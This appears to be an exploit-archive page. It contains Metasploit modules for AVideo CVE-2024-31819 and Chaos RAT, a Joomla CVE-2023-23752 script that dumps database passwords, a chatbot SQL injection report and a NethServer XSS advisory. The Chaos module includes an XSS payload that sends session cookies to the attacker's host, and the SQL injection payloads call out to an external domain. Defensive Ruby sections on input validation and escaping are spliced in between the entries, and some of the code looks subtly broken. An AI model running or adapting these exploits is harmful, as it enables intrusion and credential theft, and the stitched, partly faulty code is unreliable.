The exploit is<br /> particularly dangerous because it does not require authentication, making it possible<br /> for any remote attacker to exploit this vulnerability.<br /> },<br /> 'Author' => [<br /> 'Valentin Lobstein'<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2024-31819'],<br /> ['URL', 'https://github.com/WWBN/AVideo'],<br /> ['URL', 'https://chocapikk.com/posts/2024/cve-2024-31819']<br /> ],<br /> 'Platform' => ['php', 'unix', 'linux', 'win'],<br /> 'Arch' => [ARCH_PHP, ARCH_CMD],<br /> 'Targets' => [<br /> [<br /> 'PHP In-Memory',<br /> {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP<br /> # tested with php/meterpreter/reverse_tcp<br /> }<br /> ],<br /> [<br /> 'Unix In-Memory',<br /> {<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => ARCH_CMD<br /> # tested with cmd/linux/http/x64/meterpreter/reverse_tcp<br /> }<br /> ],<br /> [<br /> 'Windows In-Memory',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD<br /> # tested with cmd/windows/http/x64/meterpreter/reverse_tcp<br /> }<br /> ],<br /> ],<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2024-04-09',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> },<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'RPORT' => 443,<br /> 'FETCH_WRITABLE_DIR' => '/tmp'<br /> }<br /> )<br /> )<br /> end<br /><br /> def exploit<br /> php_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"<br /> filter_payload = generate_php_filter_payload(php_code)<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'data' => "systemRootPath=#{filter_payload}"<br /> )<br /> print_error("Server returned #{res.code}. 
Successful exploit attempts should not return a response.") if res&.code<br /> end<br /><br /> def check<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'index.php'),<br /> 'method' => 'GET',<br /> 'follow_redirect' => true<br /> })<br /> return CheckCode::Unknown('Failed to connect to the target.') unless res<br /> return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200<br /><br /> version_match = res.body.match(/Powered by AVideo ® Platform v([\d.]+)/) || res.body.match(/<!--.*?v:([\d.]+).*?-->/m)<br /> return CheckCode::Unknown('Unable to extract AVideo version.') unless version_match && version_match[1]<br /><br /> version = Rex::Version.new(version_match[1])<br /> plugin_check = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),<br /> 'method' => 'GET'<br /> })<br /> # Return here; without the return the Safe result was discarded and the version check ran regardless.<br /> return CheckCode::Safe('Vulnerable plugin WWBNIndex was not detected') unless plugin_check&.code == 200<br /><br /> if version.between?(Rex::Version.new('12.4'), Rex::Version.new('14.2'))<br /> return CheckCode::Appears("Detected vulnerable AVideo version: #{version}, with vulnerable plugin WWBNIndex running.")<br /> end<br /><br /> CheckCode::Safe("Detected non-vulnerable AVideo version: #{version}")<br /> end<br />end<br /></code></pre>
<pre><code>## Titles: Chat Bot - PHP (by: oretnom23 ) v1.0 Multiple SQLi<br />## Author: nu11secur1ty<br />## Date: 05/22/2024<br />## Vendor: https://github.com/oretnom23<br />## Software:<br />https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The `kw` parameter appears to be vulnerable to SQL injection attacks. The<br />payload '+(select load_file('\\\\<br />3x1lin0l3hlhoereknh4upxdx43xrufli9aw0kp.oastify.com\\rvo'))+' was submitted<br />in the kw parameter. This payload injects a SQL sub-query that calls<br />MySQL's load_file function with a UNC file path that references a URL on an<br />external domain. The application interacted with that domain, indicating<br />that the injected SQL query was executed. The attacker can get all<br />information from the system by using this vulnerability!<br /><br />STATUS: HIGH- Vulnerability<br /><br /><br />[+]Exploits:<br />- SQLi Multiple:<br />```mysql<br />---<br />Parameter: kw (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: kw=Write your query here'+(select load_file('\\\\<br />3x1lin0l3hlhoereknh4upxdx43xrufli9aw0kp.oastify.com\\rvo'))+'') OR NOT<br />5452=5452-- yJrL<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP<br />BY clause (FLOOR)<br /> Payload: kw=Write your query here'+(select load_file('\\\\<br />3x1lin0l3hlhoereknh4upxdx43xrufli9aw0kp.oastify.com\\rvo'))+'') AND (SELECT<br />6898 FROM(SELECT COUNT(*),CONCAT(0x717a6a7171,(SELECT<br />(ELT(6898=6898,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ugYc<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: kw=Write your query here'+(select load_file('\\\\<br 
/>3x1lin0l3hlhoereknh4upxdx43xrufli9aw0kp.oastify.com\\rvo'))+'') AND (SELECT<br />3334 FROM (SELECT(SLEEP(7)))MjoP)-- WPgB<br />---<br />```<br /><br />## Reproduce:<br />[href](https://www.patreon.com/posts/chat-bot-php-by-104709713)<br /><br />## Proof and Exploit:<br />[href](<br />https://www.nu11secur1ty.com/2024/05/mvogms-by-oretnom23-v10-multiple-sqli_22.html<br />)<br /><br />## Time spent:<br />01:19:00<br /><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HttpServer::HTML<br /> include Rex::Proto::Http::WebSocket<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Chaos RAT XSS to RCE',<br /> 'Description' => %q{<br /> CHAOS v5.0.8 is a free and open-source Remote Administration Tool that<br /> allows generated binaries to control remote operating systems. The<br /> webapp contains a remote command execution vulnerability which<br /> can be triggered by an authenticated user when generating a new<br /> executable. The webapp also contains an XSS vulnerability within<br /> the view of a returned command being executed on an agent.<br /><br /> Execution can happen through one of three routes:<br /><br /> 1. Provided credentials can be used to execute the RCE directly<br /><br /> 2. A JWT token from an agent can be provided to emulate a compromised<br /> host. If a logged in user attempts to execute a command on the host<br /> the returned value contains an xss payload.<br /><br /> 3. 
Similar to technique 2, an agent executable can be provided and the<br /> JWT token can be extracted.<br /><br /> Verified against CHAOS 7d5b20ad7e58e5b525abdcb3a12514b88e87cef2 running<br /> in a docker container.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'chebuya' # original PoC, analysis<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc'],<br /> [ 'URL', 'https://github.com/tiagorlampert/CHAOS'],<br /> [ 'CVE', '2024-31839'], # XSS<br /> [ 'CVE', '2024-30850'] # RCE<br /> ],<br /> 'Platform' => ['linux', 'unix'],<br /> 'Privileged' => false,<br /> 'Payload' => { 'BadChars' => ' ' },<br /> 'Arch' => ARCH_CMD,<br /> 'Targets' => [<br /> [ 'Automatic Target', {}]<br /> ],<br /> 'DefaultOptions' => {<br /> 'WfsDelay' => 3_600, # 1hr<br /> 'URIPATH' => '/' # avoid long URLs in xss payloads<br /> },<br /> 'DisclosureDate' => '2024-04-10',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(8080),<br /> OptString.new('USERNAME', [ false, 'User to login with']), # admin<br /> OptString.new('PASSWORD', [ false, 'Password to login with']), # admin<br /> OptString.new('TARGETURI', [ true, 'The URI of the Chaos Application', '/']),<br /> OptString.new('JWT', [ false, 'Agent JWT Token of the malware']),<br /> OptPath.new('AGENT', [ false, 'A Chaos Agent Binary'])<br /> ]<br /> )<br /> register_advanced_options(<br /> [<br /> OptString.new('AGENT_HOSTNAME', [ false, 'Hostname for a fake agent', 'DC01']),<br /> OptString.new('AGENT_USERNAME', [ false, 'Username for a fake agent', 'Administrator']),<br /> OptString.new('AGENT_USERID', [ false, 'User ID for a fake agent', 'Administrator']),<br /> OptEnum.new('AGENT_OS', [ false, 'OS for a fake agent', 'Windows', 
['Windows', 'Linux']]),<br /> ]<br /> )<br /> end<br /><br /> def on_request_uri(cli, request)<br /> if request.method == 'GET' && @xss_response_received == false<br /> vprint_status('Received GET request.')<br /> return unless request.uri.include? '='<br /><br /> cookie = request.uri.split('jwt=')[1]<br /> print_good("Received cookie: #{cookie}")<br /> send_response_html(cli, '')<br /> @xss_response_received = true<br /> list_agents(cookie)<br /> rce(cookie)<br /> end<br /> send_response_html(cli, '')<br /> end<br /><br /> def mac_address<br /> @mac_address ||= Faker::Internet.mac_address<br /> @mac_address<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'method' => 'GET'<br /> )<br /><br /> return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?<br /> return CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code == 200<br /><br /> return CheckCode::Detected('Chaos application found') if res.body.include?('<title>CHAOS</title>')<br /><br /> CheckCode::Safe('Chaos application not found')<br /> end<br /><br /> def login<br /> vprint_status('Attempting login')<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'auth'),<br /> 'vars_post' => {<br /> 'username' => datastore['USERNAME'],<br /> 'password' => datastore['PASSWORD']<br /> }<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 200<br /> res.get_cookies.scan(/jwt=([\w._-]+);*/).flatten[0] || ''<br /> end<br /><br /> def rce(cookie)<br /> data = Rex::MIME::Message.new<br /><br /> data.add_part("http://localhost\'$(#{payload.encoded})\'", nil, nil, 'form-data; name="address"')<br /> data.add_part('8080', nil, nil, 'form-data; 
name="port"')<br /> data.add_part('1', nil, nil, 'form-data; name="os_target"') # 1 windows, 2 linux<br /> data.add_part('', nil, nil, 'form-data; name="filename"')<br /> data.add_part('false', nil, nil, 'form-data; name="run_hidden"')<br /><br /> post_data = data.to_s<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'generate'),<br /> 'ctype' => "multipart/form-data; boundary=#{data.bound}",<br /> 'data' => post_data,<br /> 'cookie' => "jwt=#{cookie}"<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Shellcode rejected: #{res.body}") unless res.code == 200<br /> end<br /><br /> def convert_to_int_array(string)<br /> string.bytes.to_a<br /> end<br /><br /> # Retrieve the server's response and pull out the command response. The return value is<br /> # the server's response value (or 1 on failure).<br /> def recv_wsframe_status(wsock)<br /> res = wsock.get_wsframe<br /> return 1 unless res<br /><br /> begin<br /> res_json = JSON.parse(res.payload_data)<br /> rescue JSON::ParserError<br /> fail_with(Failure::UnexpectedReply, 'Failed to parse the returned JSON response.')<br /> end<br /> command = res_json['command']<br /> return 1 if command.nil?<br /><br /> command<br /> end<br /><br /> def agent_command_handler(cookie)<br /> vprint_status('WebSocket connecting to receive commands')<br /> headers = {<br /> 'Cookie' => "jwt=#{cookie}",<br /> 'X-Client' => mac_address<br /> }<br /><br /> wsock = connect_ws(<br /> 'uri' => normalize_uri(target_uri.path, 'client'),<br /> 'headers' => headers<br /> )<br /><br /> start_time = Time.now.to_i<br /> command = 1<br /> while Time.now.to_i < start_time + datastore['WfsDelay']<br /> begin<br /> Timeout.timeout(datastore['WfsDelay']) do<br /> command = recv_wsframe_status(wsock)<br /> end<br /> rescue Timeout::Error<br /> command = 1<br /> end<br /><br /> 
next if command == 1<br /><br /> vprint_good("Received agent command '#{command}', sending XSS in return")<br /><br /> data = {<br /> 'client_id' => mac_address,<br /> # removed the rickroll from the PoC :(<br /> 'response' => convert_to_int_array("</pre><script>var i = new Image;i.src='http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/'+document.cookie;</script>"),<br /> 'has_error' => false<br /> }<br /> wsock.put_wsbinary(JSON.generate(data))<br /> end<br /> print_status('Stopping WebSocket connection')<br /> end<br /><br /> def agent_callback_checkin(cookie)<br /> start_time = Time.now.to_i<br /> while Time.now.to_i < start_time + datastore['WfsDelay']<br /> print_status('Performing Callback Checkin')<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'health'),<br /> 'cookie' => "jwt=#{cookie}"<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Checkin rejected: #{res.code}") unless res.code == 200<br /><br /> body = {<br /> hostname: datastore['AGENT_HOSTNAME'],<br /> username: datastore['AGENT_USERNAME'],<br /> user_id: datastore['AGENT_USERID'],<br /> os_name: datastore['AGENT_OS'],<br /> os_arch: 'amd64',<br /> mac_address: mac_address,<br /> local_ip_address: datastore['SRVHOST'],<br /> port: datastore['SRVPORT'].to_s,<br /> fetched_unix: Time.now.to_i<br /> }<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'device'),<br /> 'cookie' => "jwt=#{cookie}",<br /> 'data' => body.to_json<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Checkin rejected: #{res.code}") unless res.code == 200<br /> Rex.sleep(30)<br /> end<br /> print_status('Stopping Callback Checkin')<br /> end<br /><br /> def 
fake_agent(server_cookie)<br /> # start callback checkins and command handler<br /> @threads = []<br /> @threads << framework.threads.spawn('CHAOS-agent-callback', false) do<br /> agent_callback_checkin(server_cookie)<br /> end<br /> @threads << framework.threads.spawn('CHAOS-agent-command-handler', false) do<br /> agent_command_handler(server_cookie)<br /> end<br /> @threads.map do |t|<br /> t.join<br /> rescue StandardError => e<br /> print_error("Error in CHAOS Rat Threads: #{e}")<br /> end<br /> end<br /><br /> #<br /> # Handle the HTTP request and return a response. Code borrowed from:<br /> # msf/core/exploit/http/server.rb<br /> #<br /> def start_http_service(opts = {})<br /> # Start a new HTTP server<br /> @http_service = Rex::ServiceManager.start(<br /> Rex::Proto::Http::Server,<br /> (opts['ServerPort'] || bindport).to_i,<br /> opts['ServerHost'] || bindhost,<br /> datastore['SSL'],<br /> {<br /> 'Msf' => framework,<br /> 'MsfExploit' => self<br /> },<br /> opts['Comm'] || _determine_server_comm(opts['ServerHost'] || bindhost),<br /> datastore['SSLCert'],<br /> datastore['SSLCompression'],<br /> datastore['SSLCipher'],<br /> datastore['SSLVersion']<br /> )<br /> @http_service.server_name = datastore['HTTP::server_name']<br /> # Default the procedure of the URI to on_request_uri if one isn't<br /> # provided.<br /> uopts = {<br /> 'Proc' => method(:on_request_uri),<br /> 'Path' => resource_uri<br /> }.update(opts['Uri'] || {})<br /> proto = (datastore['SSL'] ? 
'https' : 'http')<br /><br /> netloc = opts['ServerHost'] || bindhost<br /> http_srvport = (opts['ServerPort'] || bindport).to_i<br /> if (proto == 'http' && http_srvport != 80) || (proto == 'https' && http_srvport != 443)<br /> if Rex::Socket.is_ipv6?(netloc)<br /> netloc = "[#{netloc}]:#{http_srvport}"<br /> else<br /> netloc = "#{netloc}:#{http_srvport}"<br /> end<br /> end<br /> print_status("Listening for XSS response on: #{proto}://#{netloc}#{uopts['Path']}")<br /><br /> # Add path to resource<br /> @service_path = uopts['Path']<br /> @http_service.add_resource(uopts['Path'], uopts)<br /> end<br /><br /> def list_agents(cookie)<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'devices'),<br /> 'headers' => {<br /> 'cookie' => "jwt=#{cookie}"<br /> }<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> soup = Nokogiri::HTML(res.body)<br /> rows = soup.css('tr')<br /><br /> agent_table = Rex::Text::Table.new(<br /> 'Header' => 'Live Agents',<br /> 'Indent' => 1,<br /> 'Columns' =><br /> [<br /> 'IP',<br /> 'OS',<br /> 'Username',<br /> 'Hostname',<br /> 'MAC'<br /> ]<br /> )<br /><br /> rows.each do |row|<br /> cells = row.css('td')<br /> next if cells.length != 7<br /><br /> agent_ip = cells[4].text.strip<br /> hostname = cells[1].text.strip<br /><br /> agent_table << [agent_ip, cells[3].text.strip, cells[2].text.strip, hostname, cells[5].text.strip]<br /> report_host(host: agent_ip, name: hostname, os_name: cells[3].text.strip, info: "CHAOS C2 Agent Deployed, callback: #{datastore['RHOST']}")<br /> end<br /> print_good('Detected Agents')<br /> print_line(agent_table.to_s)<br /> end<br /><br /> def exploit<br /> unless (datastore['USERNAME'] && datastore['PASSWORD']) ||<br /> datastore['JWT'] ||<br /> datastore['AGENT']<br /> fail_with(Failure::BadConfig, 'Username and password, or JWT, or AGENT path required')<br /> end<br /> fail_with(Failure::BadConfig, 
'SRVHOST can not be 0.0.0.0, must be a valid IP address') if Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0<br /><br /> @xss_response_received = false<br /><br /> if datastore['USERNAME'] && datastore['PASSWORD']<br /> print_status('Attempting exploitation through direct login')<br /> cookie = login<br /> rce(cookie)<br /> elsif datastore['JWT']<br /> print_status('Attempting exploitation through JWT token')<br /> vprint_status("Fake MAC for agent: #{mac_address}")<br /> start_http_service<br /> fake_agent(datastore['JWT'])<br /> elsif datastore['AGENT']<br /> print_status('Attempting exploitation through Agent')<br /> fail_with(Failure::BadConfig, 'AGENT file not found') unless File.file?(datastore['AGENT'])<br /> agent_exe = File.read(datastore['AGENT'])<br /> if agent_exe =~ /main\.ServerAddress=(((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4})/<br /> server_address = ::Regexp.last_match(1)<br /> vprint_status("Server address: #{server_address}")<br /> end<br /><br /> if agent_exe =~ /main\.Port=(\d{1,6})/<br /> server_port = ::Regexp.last_match(1)<br /> vprint_status("Server port: #{server_port}")<br /> end<br /><br /> if agent_exe =~ %r{main\.Token=([a-zA-Z0-9_.\-+/=]*\.[a-zA-Z0-9_.\-+/=]*\.[a-zA-Z0-9_.\-+/=]*)}<br /> server_cookie = ::Regexp.last_match(1)<br /> vprint_status("Server JWT Token: #{server_cookie}")<br /> end<br /> fail_with(Failure::BadConfig, 'JWT token not found in agent executable') unless server_cookie<br /> vprint_status("Fake MAC for agent: #{mac_address}")<br /> start_http_service<br /> fake_agent(server_cookie)<br /> end<br /> end<br /><br /> def cleanup<br /> # Clean and stop HTTP server<br /> if @http_service<br /> begin<br /> @http_service.remove_resource(datastore['URIPATH'])<br /> @http_service.deref<br /> @http_service.stop<br /> @http_service = nil<br /> rescue StandardError => e<br /> print_error("Failed to stop http server due to #{e}")<br /> end<br /> end<br /> @threads.each(&:kill) unless @threads.nil? 
# no need for these anymore<br /> super<br /> end<br />end<br /></code></pre>
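The RCE leg of the module above works because the `address` form field of the `/generate` endpoint ends up inside a shell command line, which is why the module wraps its payload as `http://localhost'$(...)'`. As an added defensive example (my own code, not from the Metasploit module or the CHAOS project), the Ruby function below shows the allowlist validation that closes that class of bug: the callback address is parsed as a URL, the host must be a hostname or IP literal, the port must be in range, and userinfo, paths, query strings and anything containing shell metacharacters is rejected before the value goes anywhere near a command. `validate_callback_address`, `ip_literal?` and the sample inputs are my own names and constructed values; that CHAOS stores the address as a URL is an assumption based on the `http://localhost` value the module sends.

```ruby
require 'uri'
require 'ipaddr'

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no leading/trailing hyphen, at most 253 characters overall.
HOSTNAME_RE = /\A(?=.{1,253}\z)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*\z/i

# True when +host+ is a syntactically valid IPv4 or IPv6 address.
def ip_literal?(host)
  IPAddr.new(host)
  true
rescue IPAddr::InvalidAddressError, ArgumentError
  false
end

# Validates an agent callback address of the form scheme://host[:port]
# (assumed shape of the CHAOS "address" field). Returns [host, port] when
# acceptable, nil otherwise. URI.parse alone is not enough: RFC 3986 allows
# characters such as ' $ ( ) in a reg-name, so "http://localhost'$(id)'"
# parses without error; the hostname allowlist is what rejects it.
def validate_callback_address(address)
  return nil unless address.is_a?(String) && address.ascii_only? && address.length <= 300

  uri = begin
    URI.parse(address)
  rescue URI::Error
    return nil
  end

  return nil unless %w[http https].include?(uri.scheme)
  return nil if uri.userinfo || uri.query || uri.fragment
  return nil unless uri.path.nil? || uri.path.empty? || uri.path == '/'

  host = uri.hostname # strips the [] around IPv6 literals
  return nil if host.nil? || host.empty?
  return nil unless HOSTNAME_RE.match?(host) || ip_literal?(host)

  port = uri.port
  return nil unless port.is_a?(Integer) && port.between?(1, 65_535)

  [host, port]
end

# Demonstration on constructed inputs: one acceptable address, three rejections.
if __FILE__ == $PROGRAM_NAME
  [
    'http://10.0.0.5:8080',
    "http://localhost'$(id)'",    # shell substitution smuggled into the host
    'http://localhost:8080/../x', # path component
    'ftp://localhost:21'          # scheme outside the allowlist
  ].each do |addr|
    puts "#{addr.inspect} => #{validate_callback_address(addr).inspect}"
  end
end
```

The validated host and port should then be passed to the build tool as separate argv elements (for example via `Process.spawn` or `Open3` with an argument array), never re-joined into a shell string; validation alone does not help if the caller later interpolates the result into `sh -c`.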
<pre><code>#!/bin/bash<br /><br /># Exploit Title: Joomla! <= 4.2.8 - Unauthenticated Information Disclosure<br /><br /># Date: 2024-05-21<br /># CVE: CVE-2023-23752<br /># Exploit Author: Miguel Redondo (aka d4t4s3c)<br /># Vendor Homepage: https://www.joomla.org<br /># Software Link: https://downloads.joomla.org<br /># Version: <= 4.2.8<br /># Tested on: Linux<br /># Category: Web Application<br /><br />while getopts ":u:" arg; do<br /> case ${arg} in<br /> u) url=${OPTARG}; let parameter_counter+=1 ;;<br /> esac<br />done<br /><br />if [ -z "${url}" ]; then<br /> echo -e "\n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure"<br /> echo -e "\n[-] Usage: CVE-2023-23752.sh -u <url>\n"<br /> exit 1<br />else<br /> echo -e "\n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure"<br /> curl --silent --insecure "${url}/api/index.php/v1/config/application?public=true" > out.tmp<br /> echo -e "\n[i] Database info:\n"<br /> echo -e "[+] DB Type: $(sed -E 's/.*"dbtype":"([^"]+)".*/\1/' out.tmp)"<br /> echo -e "[+] DB Host: $(sed -E 's/.*"host":"([^"]+)".*/\1/' out.tmp)"<br /> echo -e "\e[92m[+] DB User: $(sed -E 's/.*"user":"([^"]+)".*/\1/' out.tmp)\e[0m"<br /> echo -e "\e[92m[+] DB Password: $(sed -E 's/.*"password":"([^"]+)".*/\1/' out.tmp)\e[0m"<br /> echo -e "[+] DB Name: $(sed -E 's/.*"db":"([^"]+)".*/\1/' out.tmp)"<br /> echo -e "[+] DB Prefix: $(sed -E 's/.*"dbprefix":"([^"]+)".*/\1/' out.tmp)"<br /> echo -e "[+] DB Encryption: $(sed -E 's/.*"dbencryption":([0-9]+).*/\1/' out.tmp)\n"<br /> exit 0<br />fi<br /></code></pre>
<pre><code>CVE-2024-34058: NethServer 7 & 8 stored cross-site scripting (XSS) in WebTop package<br /><br />[Suggested description]<br />The WebTop package for NethServer 7 and 8 allows stored XSS (for example, via the Subject field of an e-mail message).<br /><br />------------------------------------------<br /><br />[Additional Information]<br />The WebTop module installed on NethServer, produced by Sonicle, is affected by a stored cross-site scripting (XSS) vulnerability due to insufficient input sanitization and output escaping, which allows an attacker to store a malicious payload and so execute arbitrary web scripts or HTML.<br /><br />If a malicious payload is inserted within the subject field (as an example) of an e-mail, it is executed once the page is loaded through the frontend.<br /><br />Keep in extreme consideration and urgency that this vulnerability resides in the security-oriented server (and firewalling) distribution called NethServer.<br /><br />------------------------------------------<br /><br />[Vulnerability Type]<br />Cross Site Scripting (XSS)<br /><br />------------------------------------------<br /><br />[Vendor of Product]<br />Nethesis / Sonicle<br /><br />------------------------------------------<br /><br />[Affected Product Code Base]<br />NethServer - 7<br />NethServer - 8<br /><br />------------------------------------------<br /><br />[Affected Component]<br />Affected component: its mail/webmail module<br /><br />------------------------------------------<br /><br />[Attack Type]<br />Remote<br /><br />------------------------------------------<br /><br />[Impact Code execution]<br />true<br /><br />------------------------------------------<br /><br />[Impact Denial of Service]<br />true<br /><br />------------------------------------------<br /><br />[Impact Escalation of Privileges]<br />true<br /><br />------------------------------------------<br /><br />[Impact Information Disclosure]<br />true<br /><br />------------------------------------------<br /><br />[Attack Vectors]<br />A malicious payload inserted within (for example) the subject field of an e-mail will be executed once the page is loaded.<br /><br />------------------------------------------<br /><br />[Reference]<br />https://www.nethserver.org<br />https://github.com/NethServer/webtop5<br />https://github.com/NethServer/ns8-webtop<br /><br />------------------------------------------<br /><br />[Discoverer]<br />Intilangelo Andrea<br /><br />Use CVE-2024-34058.<br /><br />Additional info:<br /><br />NethServer is an Open Source operating system for the Linux enthusiast, designed for small offices and medium enterprises. From their website: "It's simple, secure and flexible" and "ready to deliver your messages, to protect your network with the built-in firewall, share your files and much more, everything on the same system."<br /><br />An unauthenticated stored XSS vulnerability, due to not adequately sanitized input or escaped output for the e-mail subject, exists in the provided Groupware, a collaboration suite of services accessible via web through any HTML5 browser, smartphone or tablet.<br />It can be leveraged for a nearly zero-click attack.<br /><br />CVSS score: tbd* (but "High")<br />CVSS vector: tbd*<br />CWE: CWE-79<br /><br />*Needs to be calculated, taking into consideration the initial partial base string "CVSS:3.1/AV:N/AC:L/PR:N": the Privileges Required of whoever sends the mail with the payload are none, and so is the User Interaction (the recipient merely viewing the mail can trigger the payload, for example to grab the session cookie), although some may argue otherwise. Scope and C/I/A (surely from Low to High) must be contextualized from the perspective of the application, what it is used for, what it contains/impacts and what is connected to it: indeed, it is a sensitive component that, "through a modern user interface and a single authentication, allows access to company mail, calendars, contacts, tasks, documents and much more, in a shared and secure platform" (quoting the product description), which means any kind of highly confidential information, even connected cloud instances (also outside the private network) and mobile device synchronization.<br /><br />https://www.cve.org/CVERecord?id=CVE-2024-34058<br /><br />Discovered and reported by Andrea Intilangelo<br /><br /><br />Timeline:<br /><br />2024-01-03: Vulnerability discovered, kept as private 0day for further verification<br />2024-01-16: Request for CVE reservation & Multi-Party vulnerability coordination and disclosure<br />2024-04-23: Contacts with vendor for: details, acknowledgments and to coordinate the responsible disclosure<br />2024-04-30: Assigned CVE number: CVE-2024-34058<br />2024-05-06: Vendor agreed to the proposed responsible disclosure date (May 17)<br />2024-05-10: Shared a PoC requested by the vendor showing the vulnerability<br />2024-05-17: Disclosure<br /></code></pre>
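The advisory above names the root cause, insufficient output escaping of the e-mail subject, without showing what the fix looks like in code. As an added example (my own Ruby, not code from WebTop, NethServer or the advisory), the snippet below places the vulnerable rendering pattern next to the hardened one: the subject is interpolated into a mailbox list item verbatim, and then escaped at the HTML boundary with the standard library's `CGI.escapeHTML`. `render_subject_unsafe`, `render_subject_safe`, `rendered_as_text?` and `round_trips?` are my own names, and the sample subject is a constructed test string, not a payload from the report.

```ruby
require 'cgi'

# Constructed sample subject carrying a script tag (not taken from the advisory).
SAMPLE_SUBJECT = "Invoice #4711 <script>document.title='x'</script>"

# Vulnerable rendering: the subject is written into the message list verbatim,
# so any markup it contains becomes part of the page (stored XSS, CWE-79).
def render_subject_unsafe(subject)
  "<li class=\"subject\">#{subject}</li>"
end

# Hardened rendering: escape at the HTML boundary, exactly once.
# CGI.escapeHTML rewrites & < > " ' so the subject can only ever be text.
def render_subject_safe(subject)
  "<li class=\"subject\">#{CGI.escapeHTML(subject)}</li>"
end

# True when the <li> wrapper holds no raw markup delimiters, i.e. the subject
# reached the page as text rather than as elements.
def rendered_as_text?(fragment)
  inner = fragment[%r{\A<li class="subject">(.*)</li>\z}m, 1]
  !inner.nil? && !inner.match?(/[<>]/)
end

# Decoding the escaped form gives back the original subject unchanged: escaping
# (unlike stripping tags) is lossless, so the user still sees what was sent.
def round_trips?(subject)
  CGI.unescapeHTML(CGI.escapeHTML(subject)) == subject
end

if __FILE__ == $PROGRAM_NAME
  puts "unsafe: #{render_subject_unsafe(SAMPLE_SUBJECT)}"
  puts "safe:   #{render_subject_safe(SAMPLE_SUBJECT)}"
end
```

Escaping must match the output context: `CGI.escapeHTML` is right for element text and quoted attribute values, but a subject placed inside a JavaScript string or a URL needs that context's encoder instead. A Content-Security-Policy that disallows inline scripts is a useful second layer for a webmail frontend, but it does not replace correct escaping.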
